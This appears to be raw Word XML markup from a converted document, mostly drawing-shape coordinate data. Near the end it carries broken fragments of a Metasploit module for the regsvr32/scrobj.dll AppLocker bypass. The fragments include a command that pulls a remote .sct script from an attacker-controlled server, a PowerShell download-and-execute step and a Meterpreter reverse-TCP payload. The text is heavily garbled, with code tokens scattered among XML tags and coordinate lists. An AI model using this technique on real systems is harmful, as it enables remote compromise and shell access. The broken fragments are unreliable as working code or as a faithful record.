,9139,4346,9143,4346,9147,4346,9152,4346,9156,4346,9160,4346,9165,4346,9170,4346,9174,4346,9179,4346,9184,4346,9189,4346,9194,4346,9199,4346,9204,4346,9210,4346,9215,4346,9221,4346,9226,4346,9232,4346,9238,4346,9244,4346,9250,4346,9256,4346,9262,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4346,9269,4345,9269,4345,9269,4345,9269,4345,9269,4345,9269,4345,9269,4345,9269,4344,9269,4344,9269,4344,9269,4344,9269,4344,9269,4343,9269,4343,9269,4343,9269,4343,9269,4342,9269,4342,9269,4342,9269,4341,9269,4341,9269,4341,9269,4340,9269,4340,9269,4339,9269,4339,9269,4338,9269,4338,9269,4337,9269,4337,9269,4336,9269,4336,9269,4335,9269,4334,9269,4334,9269,4333,9269,4332,9269,4332,9269,4331,9269,4330,9269,4329,9269,4328,9269,4328,9269,4327,9269,4326,9269,4325,9269,4324,9269,4323,9269,4322,9269,4321,9269,4320,9269,4318,9269,4317,9269,4316,9269,4315,9269,4314,9269,4312,9269,4311,9269,4310,9269,4308,9269,4307,9269,4305,9269,4304,9269,4302,9269,4301,9269,4299,9269,4298,9269,4296,9269,4294,9269,4292,9269,4291,9269,4289,9269,4287,9269,4285,9269,4283,9269,4281,9269,4279,9269,4277,9269,4275,9269,4273,9269,4271,9269,4268,9269,4266,9269,4264,9269,4261,9269,4259,9269,4256,9269,4254,9269,4251,9269,4249,9269,4246,9269,4243,9269,4241,9269,4238,9269,4235,9269,4232,9269,4229,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9269,4226,9268,4226,9268,4226,9268,4226,9268,4226,9268,4226,9268,4226,9268,4226,9268,4226,9268,4226,9267,4226,9267,4226,9267,4226,9267,4226,9267,4226,9266,4226,9266,4226,9266,4226,9265,4226,9265,4226,9265,4226,9264,4226,9264,4226,9263,4226,9263,4226,9262,4226,9262,4226,9261,4226,9260,4226,9260,4226,9259,4226,9258,4226,9257,4226,9257,4226,9256,4226,9255,4226,9254,4226,9253,4226,9252,4226,9251,4226,9250,4226,9249,4226,9247,4226,9246,4226,9245,4226,9243,4226,9242,4226,9241,4226,9239,4226,9238,4226,9236,4226,9234,4226,9233,4226,9231,4226,9229,4226,9227,4226,9225,4226,9223,4226,9221,4226,9219,4226,9217,4226,9214,4226,9212,4226,9210,4226,9207,4226,9205,4226,9202,4226,9200,4226,9197,4226,9194,4226,9191,4226,9188,4226,9185,4226,9182,4226,9179,4226,9176,4226,9172,4226,9169,4226,9165,4226,9162,4226,9158,4226,9155,4226,9151,4226,9147,4226,9143,4226,9139,4226,9135,4226,9130,4226,9126,4226,9122,4226,9117,4226,9113,4226,9108,4226,9103,4226,9098,4226,9093,4226,9088,4226,9083,4226,9078,4226,9073,4226,9067,4226,9062,4226,9056,4226,9050,4226,9044,4226,9038,4226,9032,4226,9026,4226,9020,4226,9014e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:468.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,9370" coordsize="130,270">
        <v:shape style="position:absolute;left:4210;top:9370;width:130;height:270" coordorigin="4210,9370" coordsize="130,270" path="m4226,9389l4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4226,9389,4227,9389,4227,9389,4227,9389,4227,9389,4227,9389,4227,9389,4227,9389,4227,9389,4227,9389,4228,9389,4228,9389,4228,9389,4228,9389,4228,9389,4228,9389,4229,9389,4229,9389,4229,9389,4229,9389,4230,9389,4230,9389,4230,9389,4231,9389,4231,9389,4231,9389,4232,9389,4232,9389,4233,9389,4233,9389,4234,9389,4234,9389,4235,9389,4235,9389,4236,9389,4236,9389,4237,9389,4237,9389,4238,9389,4239,9389,4239,9389,4240,9389,4241,9389,4242,9389,4242,9389,4243,9389,4244,9389,4245,9389,4246,9389,4247,9389,4248,9389,4249,9389,4250,9389,4251,9389,4252,9389,4253,9389,4254,9389,4255,9389,4256,9389,4257,9389,4259,9389,4260,9389,4261,9389,4263,9389,4264,9389,4265,9389,4267,9389,4268,9389,4270,9389,4271,9389,4273,9389,4275,9389,4276,9389,4278,9389,4280,9389,4282,9389,4283,9389,4285,9389,4287,9389,4289,9389,4291,9389,4293,9389,4295,9389,4297,9389,4300,9389,4302,9389,4304,9389,4306,9389,4309,9389,4311,9389,4313,9389,4316,9389,4318,9389,4321,9389,4324,9389,4326,9389,4329,9389,4332,9389,4334,9389,4337,9389,4340,9389,4343,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9390,4346,9390,4346,9390,4346,9390,4346,9390,4346,9391,4346,9391,4346,9391,4346,9391,4346,9392,4346,9392,4346,9392,4346,9393,4346,9393,4346,9394,4346,9394,4346,9395,4346,9395,4346,9396,4346,9396,4346,9397,4346,9398,4346,9398,4346,9399,4346,9400,4346,9401,4346,9402,4346,9403,4346,9403,4346,9404,4346,9405,4346,9407,4346,9408,4346,9409,4346,9410,4346,9411,4346,9413,4346,9414,4346,9415,4346,9417,4346,9418,4346,9420,4346,9421,4346,9423,4346,9425,4346,9427,4346,9428,4346,9430,4346,9432,4346,9434,4346,9436,4346,9438,4346,9441,4346,9443,4346,9445,4346,9448,4346,9450,4346,9453,4346,9455,4346,9458,4346,9461,4346,9463,4346,9466,4346,9469,4346,9472,4346,9475,4346,9478,4346,9482,4346,9485,4346,9488,4346,9492,4346,9495,4346,9499,4346,9503,4346,9507,4346,9511,4346,9514,4346,9519,4346,9523,4346,9527,4346,9531,4346,9536,4346,9540,4346,9545,4346,9549,4346,9554,4346,9559,4346,9564,4346,9569,4346,9574,4346,9579,4346,9585,4346,9590,4346,9596,4346,9601,4346,9607,4346,9613,4346,9619,4346,9625,4346,9631,4346,9637,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4345,9644,4345,9644,4345,9644,4345,9644,4345,9644,4345,9644,4345,9644,4344,9644,4344,9644,4344,9644,4344,9644,4344,9644,4343,9644,4343,9644,4343,9644,4343,9644,4342,9644,4342,9644,4342,9644,4341,9644,4341,9644,4341,9644,4340,9644,4340,9644,4339,9644,4339,9644,4338,9644,4338,9644,4337,9644,4337,9644,4336,9644,4336,9644,4335,9644,4334,9644,4334,9644,4333,9644,4332,9644,4332,9644,4331,9644,4330,9644,4329,9644,4328,9644,4328,9644,4327,9644,4326,9644,4325,9644,4324,9644,4323,9644,4322,9644,4321,9644,4320,9644,4318,9644,4317,9644,4316,9644,4315,9644,4314,9644,4312,9644,4311,9644,4310,9644,4308,9644,4307,9644,4305,9644,4304,9644,4302,9644,4301,9644,4299,9644,4298,9644,4296,9644,4294,9644,4292,9644,4291,9644,4289,9644,4287,9644,4285,9644,4283,9644,4281,9644,4279,9644,4277,9644,4275,9644,4273,9644,4271,9644,4268,9644,4266,9644,4264,9644,4261,9644,4259,9644,4256,9644,4254,9644,4251,9644,4249,9644,4246,9644,4243,9644,4241,9644,4238,9644,4235,9644,4232,9644,4229,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9644,4226,9643,4226,9643,4226,9643,4226,9643,4226,9643,4226,9643,4226,9643,4226,9642,4226,9642,4226,9642,4226,9642,4226,9641,4226,9641,4226,9641,4226,9641,4226,9640,4226,9640,4226,9639,4226,9639,4226,9638,4226,9638,4226,9637,4226,9637,4226,9636,4226,9636,4226,9635,4226,9634,4226,9633,4226,9633,4226,9632,4226,9631,4226,9630,4226,9629,4226,9628,4226,9627,4226,9626,4226,9625,4226,9624,4226,9623,4226,9621,4226,9620,4226,9619,4226,9617,4226,9616,4226,9614,4226,9613,4226,9611,4226,9609,4226,9608,4226,9606,4226,9604,4226,9602,4226,9600,4226,9598,4226,9596,4226,9594,4226,9592,4226,9590,4226,9587,4226,9585,4226,9583,4226,9580,4226,9577,4226,9575,4226,9572,4226,9569,4226,9566,4226,9563,4226,9560,4226,9557,4226,9554,4226,9551,4226,9548,4226,9544,4226,9541,4226,9537,4226,9533,4226,9530,4226,9526,4226,9522,4226,9518,4226,9514,4226,9510,4226,9506,4226,9501,4226,9497,4226,9492,4226,9488,4226,9483,4226,9478,4226,9474,4226,9469,4226,9464,4226,9458,4226,9453,4226,9448,4226,9442,4226,9437,4226,9431,4226,9425,4226,9420,4226,9414,4226,9408,4226,9401,4226,9395,4226,9389e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:468.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,9370" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:9370;width:130;height:270" coordorigin="4330,9370" coordsize="130,270" path="m4346,9389l4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4346,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4347,9389,4348,9389,4348,9389,4348,9389,4348,9389,4348,9389,4349,9389,4349,9389,4349,9389,4349,9389,4350,9389,4350,9389,4350,9389,4350,9389,4351,9389,4351,9389,4351,9389,4352,9389,4352,9389,4353,9389,4353,9389,4354,9389,4354,9389,4355,9389,4355,9389,4356,9389,4356,9389,4357,9389,4357,9389,4358,9389,4359,9389,4359,9389,4360,9389,4361,9389,4362,9389,4362,9389,4363,9389,4364,9389,4365,9389,4366,9389,4367,9389,4368,9389,4369,9389,4370,9389,4371,9389,4372,9389,4373,9389,4374,9389,4375,9389,4376,9389,4377,9389,4379,9389,4380,9389,4381,9389,4383,9389,4384,9389,4385,9389,4387,9389,4388,9389,4390,9389,4392,9389,4393,9389,4395,9389,4396,9389,4398,9389,4400,9389,4402,9389,4403,9389,4405,9389,4407,9389,4409,9389,4411,9389,4413,9389,4415,9389,4417,9389,4420,9389,4422,9389,4424,9389,4426,9389,4429,9389,4431,9389,4433,9389,4436,9389,4438,9389,4441,9389,4444,9389,4446,9389,4449,9389,4452,9389,4455,9389,4457,9389,4460,9389,4463,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9389,4466,9390,4466,9390,4466,9390,4466,9390,4466,9390,4466,9391,4466,9391,4466,9391,4466,9391,4466,9392,4466,9392,4466,9392,4466,9393,4466,9393,4466,9394,4466,9394,4466,9395,4466,9395,4466,9396,4466,9396,4466,9397,4466,9398,4466,9398,4466,9399,4466,9400,4466,9401,4466,9402,4466,9403,4466,9403,4466,9404,4466,9405,4466,9407,4466,9408,4466,9409,4466,9410,4466,9411,4466,9413,4466,9414,4466,9415,4466,9417,4466,9418,4466,9420,4466,9421,4466,9423,4466,9425,4466,9427,4466,9428,4466,9430,4466,9432,4466,9434,4466,9436,4466,9438,4466,9441,4466,9443,4466,9445,4466,9448,4466,9450,4466,9453,4466,9455,4466,9458,4466,9461,4466,9463,4466,9466,4466,9469,4466,9472,4466,9475,4466,9478,4466,9482,4466,9485,4466,9488,4466,9492,4466,9495,4466,9499,4466,9503,4466,9507,4466,9511,4466,9514,4466,9519,4466,9523,4466,9527,4466,9531,4466,9536,4466,9540,4466,9545,4466,9549,4466,9554,4466,9559,4466,9564,4466,9569,4466,9574,4466,9579,4466,9585,4466,9590,4466,9596,4466,9601,4466,9607,4466,9613,4466,9619,4466,9625,4466,9631,4466,9637,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4466,9644,4465,9644,4465,9644,4465,9644,4465,9644,4465,9644,4465,9644,4465,9644,4465,9644,4464,9644,4464,9644,4464,9644,4464,9644,4463,9644,4463,9644,4463,9644,4463,9644,4462,9644,4462,9644,4462,9644,4461,9644,4461,9644,4461,9644,4460,9644,4460,9644,4459,9644,4459,9644,4458,9644,4458,9644,4457,9644,4457,9644,4456,9644,4456,9644,4455,9644,4454,9644,4454,9644,4453,9644,4452,9644,4452,9644,4451,9644,4450,9644,4449,9644,4448,9644,4448,9644,4447,9644,4446,9644,4445,9644,4444,9644,4443,9644,4442,9644,4441,9644,4440,9644,4439,9644,4437,9644,4436,9644,4435,9644,4434,9644,4432,9644,4431,9644,4430,9644,4428,9644,4427,9644,4426,9644,4424,9644,4422,9644,4421,9644,4419,9644,4418,9644,4416,9644,4414,9644,4413,9644,4411,9644,4409,9644,4407,9644,4405,9644,4403,9644,4401,9644,4399,9644,4397,9644,4395,9644,4393,9644,4391,9644,4388,9644,4386,9644,4384,9644,4381,9644,4379,9644,4377,9644,4374,9644,4371,9644,4369,9644,4366,9644,4363,9644,4361,9644,4358,9644,4355,9644,4352,9644,4349,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9644,4346,9643,4346,9643,4346,9643,4346,9643,4346,9643,4346,9643,4346,9643,4346,9642,4346,9642,4346,9642,4346,9642,4346,9641,4346,9641,4346,9641,4346,9641,4346,9640,4346,9640,4346,9639,4346,9639,4346,9638,4346,9638,4346,9637,4346,9637,4346,9636,4346,9636,4346,9635,4346,9634,4346,9633,4346,9633,4346,9632,4346,9631,4346,9630,4346,9629,4346,9628,4346,9627,4346,9626,4346,9625,4346,9624,4346,9623,4346,9621,4346,9620,4346,9619,4346,9617,4346,9616,4346,9614,4346,9613,4346,9611,4346,9609,4346,9608,4346,9606,4346,9604,4346,9602,4346,9600,4346,9598,4346,9596,4346,9594,4346,9592,4346,9590,4346,9587,4346,9585,4346,9583,4346,9580,4346,9577,4346,9575,4346,9572,4346,9569,4346,9566,4346,9563,4346,9560,4346,9557,4346,9554,4346,9551,4346,9548,4346,9544,4346,9541,4346,9537,4346,9533,4346,9530,4346,9526,4346,9522,4346,9518,4346,9514,4346,9510,4346,9506,4346,9501,4346,9497,4346,9492,4346,9488,4346,9483,4346,9478,4346,9474,4346,9469,4346,9464,4346,9458,4346,9453,4346,9448,4346,9442,4346,9437,4346,9431,4346,9425,4346,9420,4346,9414,4346,9408,4346,9401,4346,9395,4346,9389e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:486.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,9730" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:9730;width:130;height:270" coordorigin="3730,9730" coordsize="130,270" path="m3746,9749l3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3746,9749,3747,9749,3747,9749,3747,9749,3747,9749,3747,9749,3747,9749,3747,9749,3747,9749,3748,9749,3748,9749,3748,9749,3748,9749,3748,9749,3749,9749,3749,9749,3749,9749,3749,9749,3750,9749,3750,9749,3750,9749,3751,9749,3751,9749,3752,9749,3752,9749,3752,9749,3753,9749,3753,9749,3754,9749,3754,9749,3755,9749,3755,9749,3756,9749,3756,9749,3757,9749,3758,9749,3758,9749,3759,9749,3760,9749,3761,9749,3761,9749,3762,9749,3763,9749,3764,9749,3765,9749,3765,9749,3766,9749,3767,9749,3768,9749,3769,9749,3770,9749,3771,9749,3772,9749,3774,9749,3775,9749,3776,9749,3777,9749,3778,9749,3780,9749,3781,9749,3782,9749,3784,9749,3785,9749,3787,9749,3788,9749,3790,9749,3791,9749,3793,9749,3794,9749,3796,9749,3798,9749,3800,9749,3801,9749,3803,9749,3805,9749,3807,9749,3809,9749,3811,9749,3813,9749,3815,9749,3817,9749,3819,9749,3821,9749,3824,9749,3826,9749,3828,9749,3831,9749,3833,9749,3836,9749,3838,9749,3841,9749,3843,9749,3846,9749,3849,9749,3851,9749,3854,9749,3857,9749,3860,9749,3863,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9750,3866,9750,3866,9750,3866,9750,3866,9750,3866,9750,3866,9751,3866,9751,3866,9751,3866,9751,3866,9752,3866,9752,3866,9752,3866,9753,3866,9753,3866,9753,3866,9754,3866,9754,3866,9755,3866,9755,3866,9756,3866,9757,3866,9757,3866,9758,3866,9759,3866,9759,3866,9760,3866,9761,3866,9762,3866,9763,3866,9764,3866,9765,3866,9766,3866,9767,3866,9768,3866,9769,3866,9770,3866,9771,3866,9773,3866,9774,3866,9776,3866,9777,3866,9778,3866,9780,3866,9782,3866,9783,3866,9785,3866,9787,3866,9789,3866,9790,3866,9792,3866,9794,3866,9797,3866,9799,3866,9801,3866,9803,3866,9805,3866,9808,3866,9810,3866,9813,3866,9815,3866,9818,3866,9821,3866,9824,3866,9826,3866,9829,3866,9832,3866,9835,3866,9839,3866,9842,3866,9845,3866,9849,3866,9852,3866,9856,3866,9859,3866,9863,3866,9867,3866,9871,3866,9875,3866,9879,3866,9883,3866,9887,3866,9891,3866,9896,3866,9900,3866,9905,3866,9910,3866,9914,3866,9919,3866,9924,3866,9929,3866,9934,3866,9940,3866,9945,3866,9950,3866,9956,3866,9962,3866,9967,3866,9973,3866,9979,3866,9985,3866,9991,3866,9998,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3865,10004,3865,10004,3865,10004,3865,10004,3865,10004,3865,10004,3865,10004,3865,10004,3865,10004,3864,10004,3864,10004,3864,10004,3864,10004,3864,10004,3863,10004,3863,10004,3863,10004,3863,10004,3862,10004,3862,10004,3862,10004,3861,10004,3861,10004,3861,10004,3860,10004,3860,10004,3859,10004,3859,10004,3859,10004,3858,10004,3858,10004,3857,10004,3856,10004,3856,10004,3855,10004,3855,10004,3854,10004,3853,10004,3853,10004,3852,10004,3851,10004,3851,10004,3850,10004,3849,10004,3848,10004,3847,10004,3846,10004,3845,10004,3845,10004,3844,10004,3843,10004,3842,10004,3840,10004,3839,10004,3838,10004,3837,10004,3836,10004,3835,10004,3833,10004,3832,10004,3831,10004,3829,10004,3828,10004,3827,10004,3825,10004,3824,10004,3822,10004,3821,10004,3819,10004,3817,10004,3816,10004,3814,10004,3812,10004,3810,10004,3809,10004,3807,10004,3805,10004,3803,10004,3801,10004,3799,10004,3797,10004,3795,10004,3793,10004,3790,10004,3788,10004,3786,10004,3783,10004,3781,10004,3779,10004,3776,10004,3774,10004,3771,10004,3769,10004,3766,10004,3763,10004,3760,10004,3758,10004,3755,10004,3752,10004,3749,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10004,3746,10003,3746,10003,3746,10003,3746,10003,3746,10003,3746,10003,3746,10002,3746,10002,3746,10002,3746,10002,3746,10001,3746,10001,3746,10001,3746,10000,3746,10000,3746,10000,3746,9999,3746,9999,3746,9998,3746,9998,3746,9997,3746,9996,3746,9996,3746,9995,3746,9994,3746,9994,3746,9993,3746,9992,3746,9991,3746,9990,3746,9989,3746,9988,3746,9987,3746,9986,3746,9985,3746,9984,3746,9983,3746,9982,3746,9980,3746,9979,3746,9977,3746,9976,3746,9975,3746,9973,3746,9971,3746,9970,3746,9968,3746,9966,3746,9964,3746,9962,3746,9961,3746,9959,3746,9956,3746,9954,3746,9952,3746,9950,3746,9948,3746,9945,3746,9943,3746,9940,3746,9938,3746,9935,3746,9932,3746,9929,3746,9927,3746,9924,3746,9921,3746,9917,3746,9914,3746,9911,3746,9908,3746,9904,3746,9901,3746,9897,3746,9894,3746,9890,3746,9886,3746,9882,3746,9878,3746,9874,3746,9870,3746,9866,3746,9862,3746,9857,3746,9853,3746,9848,3746,9843,3746,9839,3746,9834,3746,9829,3746,9824,3746,9819,3746,9813,3746,9808,3746,9803,3746,9797,3746,9791,3746,9786,3746,9780,3746,9774,3746,9768,3746,9762,3746,9755,3746,9749e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:486.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,9730" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:9730;width:130;height:270" coordorigin="3850,9730" coordsize="130,270" path="m3866,9749l3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3866,9749,3867,9749,3867,9749,3867,9749,3867,9749,3867,9749,3867,9749,3867,9749,3867,9749,3868,9749,3868,9749,3868,9749,3868,9749,3868,9749,3869,9749,3869,9749,3869,9749,3869,9749,3870,9749,3870,9749,3870,9749,3871,9749,3871,9749,3871,9749,3872,9749,3872,9749,3872,9749,3873,9749,3873,9749,3874,9749,3874,9749,3875,9749,3875,9749,3876,9749,3877,9749,3877,9749,3878,9749,3878,9749,3879,9749,3880,9749,3881,9749,3881,9749,3882,9749,3883,9749,3884,9749,3885,9749,3886,9749,3886,9749,3887,9749,3888,9749,3889,9749,3890,9749,3891,9749,3893,9749,3894,9749,3895,9749,3896,9749,3897,9749,3898,9749,3900,9749,3901,9749,3902,9749,3904,9749,3905,9749,3907,9749,3908,9749,3910,9749,3911,9749,3913,9749,3914,9749,3916,9749,3918,9749,3920,9749,3921,9749,3923,9749,3925,9749,3927,9749,3929,9749,3931,9749,3933,9749,3935,9749,3937,9749,3939,9749,3942,9749,3944,9749,3946,9749,3948,9749,3951,9749,3953,9749,3956,9749,3958,9749,3961,9749,3963,9749,3966,9749,3969,9749,3972,9749,3974,9749,3977,9749,3980,9749,3983,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9749,3986,9750,3986,9750,3986,9750,3986,9750,3986,9750,3986,9750,3986,9751,3986,9751,3986,9751,3986,9751,3986,9752,3986,9752,3986,9752,3986,9753,3986,9753,3986,9753,3986,9754,3986,9754,3986,9755,3986,9755,3986,9756,3986,9757,3986,9757,3986,9758,3986,9759,3986,9759,3986,9760,3986,9761,3986,9762,3986,9763,3986,9764,3986,9765,3986,9766,3986,9767,3986,9768,3986,9769,3986,9770,3986,9771,3986,9773,3986,9774,3986,9776,3986,9777,3986,9778,3986,9780,3986,9782,3986,9783,3986,9785,3986,9787,3986,9789,3986,9790,3986,9792,3986,9794,3986,9797,3986,9799,3986,9801,3986,9803,3986,9805,3986,9808,3986,9810,3986,9813,3986,9815,3986,9818,3986,9821,3986,9824,3986,9826,3986,9829,3986,9832,3986,9835,3986,9839,3986,9842,3986,9845,3986,9849,3986,9852,3986,9856,3986,9859,3986,9863,3986,9867,3986,9871,3986,9875,3986,9879,3986,9883,3986,9887,3986,9891,3986,9896,3986,9900,3986,9905,3986,9910,3986,9914,3986,9919,3986,9924,3986,9929,3986,9934,3986,9940,3986,9945,3986,9950,3986,9956,3986,9962,3986,9967,3986,9973,3986,9979,3986,9985,3986,9991,3986,9998,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3986,10004,3985,10004,3985,10004,3985,10004,3985,10004,3985,10004,3985,10004,3985,10004,3985,10004,3984,10004,3984,10004,3984,10004,3984,10004,3984,10004,3983,10004,3983,10004,3983,10004,3983,10004,3982,10004,3982,10004,3982,10004,3981,10004,3981,10004,3981,10004,3980,10004,3980,10004,3980,10004,3979,10004,3979,10004,3978,10004,3978,10004,3977,10004,3977,10004,3976,10004,3975,10004,3975,10004,3974,10004,3973,10004,3973,10004,3972,10004,3971,10004,3971,10004,3970,10004,3969,10004,3968,10004,3967,10004,3966,10004,3966,10004,3965,10004,3964,10004,3963,10004,3962,10004,3961,10004,3959,10004,3958,10004,3957,10004,3956,10004,3955,10004,3953,10004,3952,10004,3951,10004,3950,10004,3948,10004,3947,10004,3945,10004,3944,10004,3942,10004,3941,10004,3939,10004,3937,10004,3936,10004,3934,10004,3932,10004,3931,10004,3929,10004,3927,10004,3925,10004,3923,10004,3921,10004,3919,10004,3917,10004,3915,10004,3913,10004,3910,10004,3908,10004,3906,10004,3904,10004,3901,10004,3899,10004,3896,10004,3894,10004,3891,10004,3889,10004,3886,10004,3883,10004,3880,10004,3878,10004,3875,10004,3872,10004,3869,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10004,3866,10003,3866,10003,3866,10003,3866,10003,3866,10003,3866,10003,3866,10002,3866,10002,3866,10002,3866,10002,3866,10001,3866,10001,3866,10001,3866,10000,3866,10000,3866,10000,3866,9999,3866,9999,3866,9998,3866,9998,3866,9997,3866,9996,3866,9996,3866,9995,3866,9994,3866,9994,3866,9993,3866,9992,3866,9991,3866,9990,3866,9989,3866,9988,3866,9987,3866,9986,3866,9985,3866,9984,3866,9983,3866,9982,3866,9980,3866,9979,3866,9977,3866,9976,3866,9975,3866,9973,3866,9971,3866,9970,3866,9968,3866,9966,3866,9964,3866,9962,3866,9961,3866,9959,3866,9956,3866,9954,3866,9952,3866,9950,3866,9948,3866,9945,3866,9943,3866,9940,3866,9938,3866,9935,3866,9932,3866,9929,3866,9927,3866,9924,3866,9921,3866,9917,3866,9914,3866,9911,3866,9908,3866,9904,3866,9901,3866,9897,3866,9894,3866,9890,3866,9886,3866,9882,3866,9878,3866,9874,3866,9870,3866,9866,3866,9862,3866,9857,3866,9853,3866,9848,3866,9843,3866,9839,3866,9834,3866,9829,3866,9824,3866,9819,3866,9813,3866,9808,3866,9803,3866,9797,3866,9791,3866,9786,3866,9780,3866,9774,3866,9768,3866,9762,3866,9755,3866,9749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creates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web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that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sct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file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When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types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provided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regsvr32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regsvr32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will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request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sct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then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cute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included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PowerShell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command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This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then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downloads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executes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specified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simil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web_delivery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with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PSH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Both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web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requests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i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sct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PowerShell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download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ecute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can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occur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same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0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'License'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MSF_LICENSE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'Author'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'Casey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Smith'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AppLocker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bypass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research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vulnerability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discover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y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(@subTee)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'Trenton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Ivey'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(kn0)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10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'DefaultOptions'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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'Payload'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'windows/meterpreter/reverse_tcp'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1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'Targets'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659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'PSH'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{}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'Platform'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color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>w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win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'Arch'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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ARCH_X86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ARCH_X86_64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'DefaultTarget'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'DisclosureDate'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'Apr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19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2016'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'References'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12"/>
        </w:rPr>
        <w:t>  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'URL'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'http://subt0x10.blogspot.com/2016/04/bypass‐application‐whit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elisting‐script.html'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10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26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43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44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def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primer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46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print_status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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Run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following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machine:'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print_line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"regsvr32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/s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/n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/u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/i:#{get_uri}.sct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scrobj.dll"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26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49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50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on_request_uri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cli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_request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52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resource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request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ends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with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'.sct',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serve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.sct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file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7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999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999l1517,999,1517,999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7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2,1510,2748,1510,2744,1510,2740,1510,2736,1510,2731,1510,2727,1510,2723,1510,2718,1510,2713,1510,2709,1510,2704,1510,2699,1510,2694,1510,2688,1510,2683